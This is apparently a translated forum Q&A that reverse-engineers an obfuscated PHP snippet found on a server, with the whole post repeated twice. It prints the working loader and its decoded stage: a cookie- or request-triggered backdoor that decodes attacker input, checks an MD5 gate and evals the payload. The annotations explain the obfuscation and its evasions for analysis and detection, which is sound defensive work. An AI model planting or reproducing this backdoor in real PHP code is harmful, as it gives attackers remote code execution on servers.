请帮助理解混淆的加密 php 代码
Please help to understand obfuscated encrypted php code
发现了下面这段代码,PHP 可以正常解释执行它,但我不明白它是如何工作的:
// Stage 1 of the loader: XOR of two equal-length string literals. PHP's ^ on two
// strings works byte by byte, and here the result is 'create_function' (the VLD
// dump further down shows ASSIGN !0, 'create_function'). The function name never
// appears in the file as plain text, so a plain-text search for create_function
// or eval does not match it. The statement that follows uses the same
// literal-XOR trick to hide the code string passed to create_function().
// NOTE(review): the variable names look machine-generated, so they probably
// differ between copies; the "string ^ string, then call the result" shape is
// the more stable thing to look for. Confirm against other samples.
$MfgVs='.Y 8:4cM:<Q39SP'^'M+EYNQ<+OR2GP<>';
$gxkCISZo=$MfgVs('','B3EEZ7+OFT Vr0OYIEGru59R5-SN4r38OOeCOm8OHT8V35=8Cj4 <,XZ88:nA3>DnDL;VbCw,5+GWFQkV.YHqG=9>vGkoClKP23C:dP>VZkChuF9YK0YL3Xja4.JVdrdE1FgsaYMbR<6mhmBMf>AN4lPD5Zozc>,>nb,jTEC>ATH-KGXYGD9SL3dkHE=25-Fs;2NhY07.3.6fQJOJ+WRnH; SSHmq,4IAkKW1Olv17TSUJrRWWLXP7>ZjE6,6tq<,r85Yf>.1wUdfe5J5LWQqLkehZU,9jUPYyqZG<V:BExl>57PAKbU,A5KNI42>rSReXlq1R3,JI0CbZDKPRCYhZF.nkq4+>mG+SxuFX4Ssowo4Z>DSqf,Ny:h08XYbY. cdeAREYbNADhR,<+CMJb2LP8XqS2+nJeHc5OXTETH4FYXVN89 =B<BXV:22S<AhbP7<q6S0.aC53SYDORiH>LL2azRVD0-,<<QUzETy16kV4.CRabBeV1N5,1VP>;-S962 QsU 1NNNqI,: cOQTWb44ydS1XJJaj>PYJ>oFUKFAD,ZxYSd1BEyVGawBPSgy+r1LsDLksay7tyHQhY-8<RBfQHUbK9S1TIQVHO0Y=+QNGmbTRY,zSwMeXpk0d>71W5Lp3XT6=kAA;=6Y2mnbk<E=U-=ftNcr4'^'+Umd<BE,2=O8-U70:14ZRMV jI2:U-lU:;BjfMCEA2M8PATW-JLONs<;LYe1,FJlJ -O7NcSGPRnwfqKvUSAxcRLJVzKHdWAY;U,HLtWvgKsSUbPe8D+ V6BEPO>7MIDaXmLZkPDF=IBMFPbeBZ :U7t-hz1ZGUIG5FEJqe0J38-Ccc3<>mdzw9mb: IGGCnWTG:Ab:>S9S<lu..>JwoN.ZL 6sgUHU= 4 2HoQVWV8 0qxX18>=1TVzBaioy;:uiRYFyBUKHWhZFAC+Y92xQ7alL>4XX5>5 YLzcW3CyOqHZTC1avBqZ Y>+r>O4x:4EpMUU3GMciKIk<+953 1Hrbq<. anm9gJ XQ-=MsNQWKB;R16XFWDp3LTY,8=2KYCYEe9 YDHML6MHJcpjFD-<M=JY;Vd7oBGQ.,5eiht37+3<QXLT8Yj 9HmV2H 7==BHYT2CKWwjW6:++7AlZ-8SHVrr QYMcW4,SlosXPCrPO73ADdE7C<TUn=5GdH+PEFSyT>EHibnU-MNAJowrwJYPLLwU9>+:MU5 mcFfhvffvN;MigWWq L0wUDva6PJNBWyEsuZAYJQSPhwNyLJN3;9:-,=.A:B :yq8.I5RJ5ikMF03-MSzWmExPKKn7RG6YdTW9 WfL1 BQY8VJ3KP6LX-DINDgXxI');
// $gxkCISZo holds what the dynamic call on the previous statement returned;
// create_function() returns the name of the anonymous function it compiled from
// the code string, so this call runs the hidden code whenever this file executes.
// create_function() was deprecated in PHP 7.2 and removed in PHP 8.0, so the
// loader only works on older runtimes.
$gxkCISZo();
$MfgVs 解出来是 create_function,这一点很清楚,但里面是什么???非常酷的混淆,但可以解密吗?
其实没那么酷,这段代码解码后是:
// Decoded stage 2, helper: repeating-key XOR. Byte i of $data is XORed with byte
// (i mod strlen($key)) of $key and the results are concatenated. XOR is its own
// inverse, so the same routine both hides and recovers a blob for a given key.
// The function_exists() guard skips the definition when a function with this
// name already exists (presumably so running the snippet twice in one request
// does not trigger a redeclaration error).
if(!function_exists('xor_data__mut')) {
function xor_data__mut($data, $key) {
$out = '';
// The key is indexed modulo its length, i.e. it repeats for as long as $data lasts.
for($i = 0; $i<strlen($data); $i++)
$out .= ($data[$i] ^ $key[$i % strlen($key)]);
return($out);
}
}
// Decoded stage 2, main body: a request-triggered backdoor. Every value it acts
// on comes from the HTTP request; anyone who can produce a blob that passes the
// check below gets PHP code executed by this script.
$data = false;
$data_key = false;
// Each iteration overwrites the previous one, so only the last cookie survives:
// its name becomes the XOR key and its value the encoded blob.
foreach ($_COOKIE as $key => $value) {
$data_key = $key;
$data = $value;
}
// Fallback when the cookies left $data falsy: the same last-entry-wins scan
// over $_REQUEST.
if (!$data) {
foreach ($_REQUEST as $key => $value) {
$data_key = $key;
$data = $value;
}
}
// Decode pipeline: base64_decode() -> XOR with the parameter name -> unserialize().
// unserialize() on request-controlled bytes is unsafe in its own right (object
// injection); the '@' suppresses the notices malformed input would raise, so
// failed attempts leave nothing in the PHP error log.
$data = @unserialize(xor_data__mut(base64_decode($data), $data_key));
// Gate: the decoded value must contain 'key' whose MD5 equals the hard-coded
// digest, and 'payload'. The digest and the helper name xor_data__mut are fixed
// strings of this decoded stage; on disk they exist only in XOR-ed form, so they
// help when matching other decoded samples, not when searching files directly.
if($data && array_key_exists('key', $data) && (md5($data['key']) == '2ba5043f3e5f04341e73e0f56791283f') && array_key_exists('payload', $data)) {
// Request-supplied PHP is executed with the privileges of the PHP process;
// exit(0) then ends the script, so nothing after this snippet runs for that request.
eval($data['payload']);
exit(0);
}
如何找到的?
通过使用 Vulcan Logic Dumper,您可以在内部查看正在发生的事情:
Finding entry points
Branch analysis from position: 0
Jump found. (Code = 62) Position 1 = -2
function name: (null)
number of ops: 9
compiled vars: !0 = $MfgVs, !1 = $gxkCISZo
line #* E I O op fetch ext return operands
-------------------------------------------------------------------------------------
2 0 E > ASSIGN !0, 'create_function'
3 1 INIT_DYNAMIC_CALL !0
2 SEND_VAL_EX ''
3 SEND_VAL_EX 'if%28%21function_exists%28%27xor_data__mut%27%29%29+%7B%0A%09function+xor_data__mut%28%24data%2C+%24key%29+++++%7B%0A%09%09%24out+%3D+%27%27%3B%0A%09%09for%28%24i+%3D+0%3B+%24i%3Cstrlen%28%24data%29%3B+%24i%2B%2B%29%0A%09%09%24out+.%3D+%28%24data%5B%24i%5D+%5E+%24key%5B%24i+%25+strlen%28%24key%29%5D%29%3B%0A%09%09return%28%24out%29%3B%0A%09%7D%0A%7D%0A%0A%24data+%3D+false%3B%0A%24data_key+%3D+false%3B%0A%0Aforeach+%28%24_COOKIE+as+%24key+%3D%3E+%24value%29+%7B%0A%09%24data_key+%3D+%24key%3B%0A%09%24data+%3D+%24value%3B%0A%7D%0A%0Aif+%28%21%24data%29+%7B%0A%09foreach+%28%24_REQUEST+as+%24key+%3D%3E+%24value%29+%7B%0A%09%09%24data_key+%3D+%24key%3B%0A%09%09%24data+%3D+%24value%3B%0A%09%7D%0A%7D%0A%0A%24data+%3D+%40unserialize%28xor_data__mut%28base64_decode%28%24data%29%2C+%24data_key%29%29%3B%0Aif%28%24data+%26%26+array_key_exists%28%27key%27%2C+%24data%29+%26%26+%28md5%28%24data%5B%27key%27%5D%29+%3D%3D+%272ba5043f3e5f04341e73e0f56791283f%27%29+%26%26+array_key_exists%28%27payload%27%2C+%24data%29%29++++++%7B%0A%09eval%28%24data%5B%27payload%27%5D%29%3B%0A%09exit%280%29%3B%0A%7D'
4 DO_FCALL 0
5 ASSIGN !1,
4 6 INIT_DYNAMIC_CALL !1
7 DO_FCALL 0
8 > RETURN 1
SEND_VAL_EX 的操作数只是经过了 URL(百分号)编码;对其解码,就得到了传给 create_function 的代码。
发现了下面这段代码,PHP 可以正常解释执行它,但我不明白它是如何工作的:
// Stage 1 of the loader: XOR of two equal-length string literals. PHP's ^ on two
// strings works byte by byte, and here the result is 'create_function' (the VLD
// dump further down shows ASSIGN !0, 'create_function'). The function name never
// appears in the file as plain text, so a plain-text search for create_function
// or eval does not match it. The statement that follows uses the same
// literal-XOR trick to hide the code string passed to create_function().
// NOTE(review): the variable names look machine-generated, so they probably
// differ between copies; the "string ^ string, then call the result" shape is
// the more stable thing to look for. Confirm against other samples.
$MfgVs='.Y 8:4cM:<Q39SP'^'M+EYNQ<+OR2GP<>';
$gxkCISZo=$MfgVs('','B3EEZ7+OFT Vr0OYIEGru59R5-SN4r38OOeCOm8OHT8V35=8Cj4 <,XZ88:nA3>DnDL;VbCw,5+GWFQkV.YHqG=9>vGkoClKP23C:dP>VZkChuF9YK0YL3Xja4.JVdrdE1FgsaYMbR<6mhmBMf>AN4lPD5Zozc>,>nb,jTEC>ATH-KGXYGD9SL3dkHE=25-Fs;2NhY07.3.6fQJOJ+WRnH; SSHmq,4IAkKW1Olv17TSUJrRWWLXP7>ZjE6,6tq<,r85Yf>.1wUdfe5J5LWQqLkehZU,9jUPYyqZG<V:BExl>57PAKbU,A5KNI42>rSReXlq1R3,JI0CbZDKPRCYhZF.nkq4+>mG+SxuFX4Ssowo4Z>DSqf,Ny:h08XYbY. cdeAREYbNADhR,<+CMJb2LP8XqS2+nJeHc5OXTETH4FYXVN89 =B<BXV:22S<AhbP7<q6S0.aC53SYDORiH>LL2azRVD0-,<<QUzETy16kV4.CRabBeV1N5,1VP>;-S962 QsU 1NNNqI,: cOQTWb44ydS1XJJaj>PYJ>oFUKFAD,ZxYSd1BEyVGawBPSgy+r1LsDLksay7tyHQhY-8<RBfQHUbK9S1TIQVHO0Y=+QNGmbTRY,zSwMeXpk0d>71W5Lp3XT6=kAA;=6Y2mnbk<E=U-=ftNcr4'^'+Umd<BE,2=O8-U70:14ZRMV jI2:U-lU:;BjfMCEA2M8PATW-JLONs<;LYe1,FJlJ -O7NcSGPRnwfqKvUSAxcRLJVzKHdWAY;U,HLtWvgKsSUbPe8D+ V6BEPO>7MIDaXmLZkPDF=IBMFPbeBZ :U7t-hz1ZGUIG5FEJqe0J38-Ccc3<>mdzw9mb: IGGCnWTG:Ab:>S9S<lu..>JwoN.ZL 6sgUHU= 4 2HoQVWV8 0qxX18>=1TVzBaioy;:uiRYFyBUKHWhZFAC+Y92xQ7alL>4XX5>5 YLzcW3CyOqHZTC1avBqZ Y>+r>O4x:4EpMUU3GMciKIk<+953 1Hrbq<. anm9gJ XQ-=MsNQWKB;R16XFWDp3LTY,8=2KYCYEe9 YDHML6MHJcpjFD-<M=JY;Vd7oBGQ.,5eiht37+3<QXLT8Yj 9HmV2H 7==BHYT2CKWwjW6:++7AlZ-8SHVrr QYMcW4,SlosXPCrPO73ADdE7C<TUn=5GdH+PEFSyT>EHibnU-MNAJowrwJYPLLwU9>+:MU5 mcFfhvffvN;MigWWq L0wUDva6PJNBWyEsuZAYJQSPhwNyLJN3;9:-,=.A:B :yq8.I5RJ5ikMF03-MSzWmExPKKn7RG6YdTW9 WfL1 BQY8VJ3KP6LX-DINDgXxI');
// $gxkCISZo holds what the dynamic call on the previous statement returned;
// create_function() returns the name of the anonymous function it compiled from
// the code string, so this call runs the hidden code whenever this file executes.
// create_function() was deprecated in PHP 7.2 and removed in PHP 8.0, so the
// loader only works on older runtimes.
$gxkCISZo();
$MfgVs 解出来是 create_function,这一点很清楚,但里面是什么???非常酷的混淆,但可以解密吗?
其实没那么酷,这段代码解码后是:
// Decoded stage 2, helper: repeating-key XOR. Byte i of $data is XORed with byte
// (i mod strlen($key)) of $key and the results are concatenated. XOR is its own
// inverse, so the same routine both hides and recovers a blob for a given key.
// The function_exists() guard skips the definition when a function with this
// name already exists (presumably so running the snippet twice in one request
// does not trigger a redeclaration error).
if(!function_exists('xor_data__mut')) {
function xor_data__mut($data, $key) {
$out = '';
// The key is indexed modulo its length, i.e. it repeats for as long as $data lasts.
for($i = 0; $i<strlen($data); $i++)
$out .= ($data[$i] ^ $key[$i % strlen($key)]);
return($out);
}
}
// Decoded stage 2, main body: a request-triggered backdoor. Every value it acts
// on comes from the HTTP request; anyone who can produce a blob that passes the
// check below gets PHP code executed by this script.
$data = false;
$data_key = false;
// Each iteration overwrites the previous one, so only the last cookie survives:
// its name becomes the XOR key and its value the encoded blob.
foreach ($_COOKIE as $key => $value) {
$data_key = $key;
$data = $value;
}
// Fallback when the cookies left $data falsy: the same last-entry-wins scan
// over $_REQUEST.
if (!$data) {
foreach ($_REQUEST as $key => $value) {
$data_key = $key;
$data = $value;
}
}
// Decode pipeline: base64_decode() -> XOR with the parameter name -> unserialize().
// unserialize() on request-controlled bytes is unsafe in its own right (object
// injection); the '@' suppresses the notices malformed input would raise, so
// failed attempts leave nothing in the PHP error log.
$data = @unserialize(xor_data__mut(base64_decode($data), $data_key));
// Gate: the decoded value must contain 'key' whose MD5 equals the hard-coded
// digest, and 'payload'. The digest and the helper name xor_data__mut are fixed
// strings of this decoded stage; on disk they exist only in XOR-ed form, so they
// help when matching other decoded samples, not when searching files directly.
if($data && array_key_exists('key', $data) && (md5($data['key']) == '2ba5043f3e5f04341e73e0f56791283f') && array_key_exists('payload', $data)) {
// Request-supplied PHP is executed with the privileges of the PHP process;
// exit(0) then ends the script, so nothing after this snippet runs for that request.
eval($data['payload']);
exit(0);
}
如何找到的?
通过使用 Vulcan Logic Dumper,您可以在内部查看正在发生的事情:
Finding entry points
Branch analysis from position: 0
Jump found. (Code = 62) Position 1 = -2
function name: (null)
number of ops: 9
compiled vars: !0 = $MfgVs, !1 = $gxkCISZo
line #* E I O op fetch ext return operands
-------------------------------------------------------------------------------------
2 0 E > ASSIGN !0, 'create_function'
3 1 INIT_DYNAMIC_CALL !0
2 SEND_VAL_EX ''
3 SEND_VAL_EX 'if%28%21function_exists%28%27xor_data__mut%27%29%29+%7B%0A%09function+xor_data__mut%28%24data%2C+%24key%29+++++%7B%0A%09%09%24out+%3D+%27%27%3B%0A%09%09for%28%24i+%3D+0%3B+%24i%3Cstrlen%28%24data%29%3B+%24i%2B%2B%29%0A%09%09%24out+.%3D+%28%24data%5B%24i%5D+%5E+%24key%5B%24i+%25+strlen%28%24key%29%5D%29%3B%0A%09%09return%28%24out%29%3B%0A%09%7D%0A%7D%0A%0A%24data+%3D+false%3B%0A%24data_key+%3D+false%3B%0A%0Aforeach+%28%24_COOKIE+as+%24key+%3D%3E+%24value%29+%7B%0A%09%24data_key+%3D+%24key%3B%0A%09%24data+%3D+%24value%3B%0A%7D%0A%0Aif+%28%21%24data%29+%7B%0A%09foreach+%28%24_REQUEST+as+%24key+%3D%3E+%24value%29+%7B%0A%09%09%24data_key+%3D+%24key%3B%0A%09%09%24data+%3D+%24value%3B%0A%09%7D%0A%7D%0A%0A%24data+%3D+%40unserialize%28xor_data__mut%28base64_decode%28%24data%29%2C+%24data_key%29%29%3B%0Aif%28%24data+%26%26+array_key_exists%28%27key%27%2C+%24data%29+%26%26+%28md5%28%24data%5B%27key%27%5D%29+%3D%3D+%272ba5043f3e5f04341e73e0f56791283f%27%29+%26%26+array_key_exists%28%27payload%27%2C+%24data%29%29++++++%7B%0A%09eval%28%24data%5B%27payload%27%5D%29%3B%0A%09exit%280%29%3B%0A%7D'
4 DO_FCALL 0
5 ASSIGN !1,
4 6 INIT_DYNAMIC_CALL !1
7 DO_FCALL 0
8 > RETURN 1
SEND_VAL_EX 的操作数只是经过了 URL(百分号)编码;对其解码,就得到了传给 create_function 的代码。